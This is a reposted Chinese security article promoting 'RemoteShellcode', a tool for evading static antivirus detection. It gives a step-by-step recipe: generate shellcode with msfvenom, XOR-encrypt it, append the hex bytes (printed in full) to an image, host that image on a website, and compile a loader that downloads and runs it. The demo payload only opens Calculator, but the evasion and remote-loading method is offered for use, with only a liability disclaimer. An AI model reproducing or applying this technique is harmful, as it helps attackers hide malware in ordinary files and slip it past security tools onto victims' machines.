采用分离加载文件的方式实现静态免杀,从而降低静态检测风险

admin
admin
admin
0
文章
0
评论
2025-12-22 04:18:04 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 文档介绍了RemoteShellcode工具,它通过分离加载文件的方式实现静态免杀以降低检测风险。使用流程包括:用msfvenom生成shellcode,通过EncryptedShellcode.py进行XOR加密,将结果转换为十六进制并导入图片末尾,最后用RemoteLoader.cpp替换URL编译运行。这种技术将恶意代码隐藏在普通图片中,绕过安全检测。 综合评分: 79 文章分类: 免杀,漏洞分析,安全工具,WEB安全,红队

cover_image

采用分离加载文件的方式实现静态免杀,从而降低静态检测风险

qifengli313

夜组安全

2025年12月16日 08:01 青海

免责声明

由于传播、利用本公众号夜组安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号夜组安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!所有工具安全性自测!!!VX:baobeiaini_ya

朋友们现在只对常读和星标的公众号才展示大图推送,建议大家把夜组安全设为星标”,否则可能就看不到了啦!

工具介绍

RemoteShellcode采用分离加载文件的方式实现静态免杀,从而降低静态检测风险

工具使用

通过命令生成一段弹计算器的shellcode

msfvenom -p windows/x64/exec cmd=calc.exe -f python

接着用EncryptedShellcode.py进行xor的加密

再把结果转换为十六进制 a8 20 ea 97 99 9b a1 78 6f 72 2a 34 38 04 3a 38 25 21 42 b3 1d 27 f9 39 05 31 df 3a 71 3b e2 21 41 30 e4 00 3b 2d 76 e3 22 23 3e 58 ba 29 49 af de 57 04 05 56 44 49 32 a8 ba 6c 39 6e b3 89 88 2b 15 39 21 f8 3b 53 ea 3a 53 3a 6a b5 f2 d4 e0 69 73 69 3b e4 b8 1b 15 23 64 a9 04 e3 21 6b 2d f8 21 58 26 73 bb 86 2f 1c 97 a0 32 e2 47 e9 30 6e a4 26 54 b0 1c 59 a9 df 28 b2 a8 75 2e 73 aa 5d 99 21 99 25 70 25 57 69 3d 56 a3 1e bd 21 10 e3 29 57 20 72 b1 1e 2e f9 67 2d 3d df 28 75 3a 68 a3 20 f3 6b fa 23 64 a9 15 30 28 2b 37 2a 3b 39 37 33 32 24 23 1c eb 85 53 28 21 9e 98 37 33 32 3f 31 df 7a 80 24 96 8c 9e 25 27 c8 6a 65 79 54 68 69 73 69 3b ec f5 6e 73 6b 65 38 ee 59 e2 1c ee 8c b4 c3 9f c7 c9 33 38 ee ce fc ce f4 8c b4 30 ec b6 43 59 7f 28 62 e9 88 89 06 64 c3 28 61 19 0a 13 54 31 28 fa b3 8c b4 1b 0e 1e 08 4b 1c 2c 0d 69 用010editor工具导入到某张图片的末尾

最后再把生成的图片放到某个网站下面

用RemoteLoader.cpp替换url编译运行,成功弹窗

工具获取

点击关注下方名片进入公众号

回复关键字【251216】获取下载链接

往期精彩

[爱站一键化权重查询v2.0

2025-12-15

](https://mp.weixin.qq.com/s?_biz=Mzk0ODM0NDIxNQ==&mid=2247495870&idx=1&sn=c195e315622adf9b84a35e97da3f26c2&scene=21#wechatredirect)[Redis 漏洞图形化利用工具

2025-12-12

](https://mp.weixin.qq.com/s?_biz=Mzk0ODM0NDIxNQ==&mid=2247495860&idx=1&sn=9dd5691a3e685ad899f1c23bf0dd87ca&scene=21#wechatredirect)[CTF竞赛系统、知识竞赛系统、漏洞靶场练习系统

2025-12-11

](https://mp.weixin.qq.com/s?_biz=Mzk0ODM0NDIxNQ==&mid=2247495852&idx=1&sn=d321a399d3433502190a7471df33ae68&scene=21#wechatredirect)[黑域侵入者是一个沉浸式的黑客终端模拟器网页游戏

2025-12-10

](https://mp.weixin.qq.com/s?_biz=Mzk0ODM0NDIxNQ==&mid=2247495836&idx=1&sn=04576d4e80b135a1f144af706c81ef3c&scene=21#wechatredirect)[一款聚合型信息收集插件,支持综合查询,资产测绘查询,信息收集 敏感信息提取、js资源扫描、目录扫描、vue组件扫描

2025-12-09

](https://mp.weixin.qq.com/s?_biz=Mzk0ODM0NDIxNQ==&mid=2247495826&idx=1&sn=3091b331962d3d0cc3b3d38981305ee4&scene=21#wechatredirect)

查看原文:《采用分离加载文件的方式实现静态免杀,从而降低静态检测风险》

版权声明

本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。

ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
评论:0   参与:  0